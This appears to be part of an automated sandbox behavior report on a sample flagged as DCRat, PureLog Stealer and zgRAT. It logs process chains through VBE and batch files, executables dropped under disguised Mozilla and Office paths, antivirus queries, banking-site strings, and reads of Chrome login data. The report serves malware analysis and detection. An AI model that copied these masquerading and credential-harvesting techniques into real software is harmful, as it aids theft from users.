                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 594281Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 593953Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 593688Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 593375Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 593125Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 592891Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 592672Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 592422Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 592141Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 591906Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 591594Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 591375Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 591063Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 590688Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 590344Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 590000Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 589688Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 589375Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 589031Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 588688Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 588500Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 588391Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 588281Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 588172Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 588036Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587906Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587790Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587687Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587578Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587469Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587352Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587232Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587125Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587003Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 586882Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 586766Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 586641Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 586531Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 586422Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 586297Jump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: hyperbrokerhostNetsvc.exe, 00000006.00000002.2304908980.0000000003289000.00000004.00000800.00020000.00000000.sdmp, hyperbrokerhostNetsvc.exe, 00000006.00000002.2308672698.0000000013281000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000129E1000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.00000000029E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 3Xw8gXHgvkZXWI1iKlkm7cJkCRX0rC5Q0+ga2PCvsQCRADmTXH+G7qayf0yxc4w0ftsUvbobPKCmtJ8dcFG021fRg7vhBqfFcJ44QfQZ3MZlXDkznwnG+8N4asqLk7YM4o1LV6y3vr8Rf7NoeqP9n2CIoi9FdJpPoPTdxOoIyg5Jg5GtZo+ejgQ718zwVoNcxKmr2ZP6eemtNni6FRJaDJ2YG29yrAX0Csx6lWv2yar7hRmLYtLKl3YbONW61LmEGV/bSXZpne1xfSuVUyCWgNNgCZoncADUmYaZ+254+gB1cgjnuHAh6yJoMnq6utLBU7YyonqNq/PjwmJySTd7ypYHmWxPme7LLTHwEJTDAE56njBkq2rj+OewgGm3NeVNJn0WardfC/mpn9SB7xgnoz68zuYxupyECrYis2mxjheZa7FQ4pDvFo/b9+5GXQDNPz8GeXuFQQgS5BQfTXiMjr4c+kKQeNYYATcbNjcFD9/0jkoyUJtB5noDCNzBq6m48yRzGNC1Ym7WY0YM1KAAPGkHGfsDTu4P//69jc17r1l1hwb2D0TQcv0cOTMh1sUwYadlmjxNxpN9TmBOYG6tgNXH+L/rC85XU79JgF0Fw8X7pP24kl4xAQTJqeXXXEPToYpLVGA5g6BiurgqkJoggP/wLt+rVfqRlIL3zq7FrQCcLqX+L14D0Vjwl8xI62SlyQ1etEB8dLB8U4aJXsiEm0lldExK0aydgomBcGAso9XpOKY0q6KGCmAMwzQgWJ2spdbSIJUy10aYNXV5KToLgX1V9aDRpTEl0gV9NOsRgacGzIRt5rvB/RSnryHAJBWh1QtVc/JxHAbB7HiTUT5NRhp+NzFFQ3Lm3zO43COUvzplSH6OpGvHMAWkps9/1Nm0+sXooqgm0O4tQTAte75EfMQdicKNFMbAsbSlV9nmgf5EO3G0vjKwdl6hBQNXmUwmsF/z+79Zo2mXdw4Y3plaO9lutjwZYg8CUBTiXVRQ/Vnz6IpFizLOvW/qVWZeiT4KdSr9y0dfWrtVx5CVHsCpzw==
                          Source: 041SLKctM1.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                          Source: 041SLKctM1.12.drBinary or memory string: discord.comVMware20,11696428655f
                          Source: 041SLKctM1.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: global block list test formVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                          Source: 041SLKctM1.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                          Source: 041SLKctM1.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                          Source: 041SLKctM1.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                          Source: 041SLKctM1.12.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                          Source: 041SLKctM1.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3503278468.000000001B2BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: 041SLKctM1.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: outlook.office.comVMware20,11696428655s
                          Source: 041SLKctM1.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                          Source: 041SLKctM1.12.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                          Source: wscript.exe, 00000002.00000003.2262074930.0000000000DC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+d
                          Source: 041SLKctM1.12.drBinary or memory string: AMC password management pageVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: tasks.office.comVMware20,11696428655o
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                          Source: 041SLKctM1.12.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                          Source: 041SLKctM1.12.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                          Source: 041SLKctM1.12.drBinary or memory string: dev.azure.comVMware20,11696428655j
                          Source: 041SLKctM1.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                          Source: hyperbrokerhostNetsvc.exe, 00000006.00000002.2315348256.000000001C1C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
                          Source: hyperbrokerhostNetsvc.exe, 00000006.00000000.2263404724.0000000000C42000.00000002.00000001.01000000.0000000A.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe0.6.dr, vVSUwBXtljAfFANPiZBBPFzlgh.exe.6.dr, wininit.exe.6.dr, hyperbrokerhostNetsvc.exe.0.drBinary or memory string: qykX1sOLrjsfnXQeMU6l
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                          Source: 041SLKctM1.12.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                          Source: 041SLKctM1.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                          Source: 041SLKctM1.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeAPI call chain: ExitProcess graph end nodegraph_0-25137
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007DF838
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007E7DEE mov eax, dword ptr fs:[00000030h]0_2_007E7DEE
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007EC030 GetProcessHeap,0_2_007EC030
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007DF838
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DF9D5 SetUnhandledExceptionFilter,0_2_007DF9D5
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007DFBCA
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007E8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007E8EBD
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\jweBRAt.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\PortCommon\hyperbrokerhostNetsvc.exe C:\PortCommon/hyperbrokerhostNetsvc.exeJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Uhg5bQrQMo.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe "C:\Program Files (x86)\mozilla maintenance service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe" Jump to behavior
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000538D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000538D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"?","CC Count (1671)":"?","History Count (1671)":"?"},"5.0.4",5,1,"","user","715575","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\mozilla maintenance service\\logs","23UYDEOU4 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","154.16.192.203","US / United States","New York / New York","40.7123 / -74.0068"]
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000547C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.4",5,1,"","user","715575","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\mozilla maintenance service\\logs","23UYDEOU4 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","154.16.192.203","US / United States","New York / New York","40.7123 / -74.0068"]
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .4",5,1,"","user","715575","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\mozilla maintenance service\\logs","23UYDEOU4 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","154.
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000547C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DF654 cpuid 0_2_007DF654
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_007DAF0F
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeQueries volume information: C:\PortCommon\hyperbrokerhostNetsvc.exe VolumeInformationJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeQueries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_007DDF1E
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007CB146 GetVersionExW,0_2_007CB146
                          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: eC:/Users/All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TC:/Users/All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vC:/Users/All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 0000000C.00000002.3259059706.00000000055E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.2308672698.0000000013281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: hyperbrokerhostNetsvc.exe PID: 5492, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: vVSUwBXtljAfFANPiZBBPFzlgh.exe PID: 4980, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 6.0.hyperbrokerhostNetsvc.exe.c40000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.2002850710.0000000006AB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000000.2263404724.0000000000C42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\hyperbrokerhostNetsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\sihost.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 6.0.hyperbrokerhostNetsvc.exe.c40000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\hyperbrokerhostNetsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\sihost.exe, type: DROPPED
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
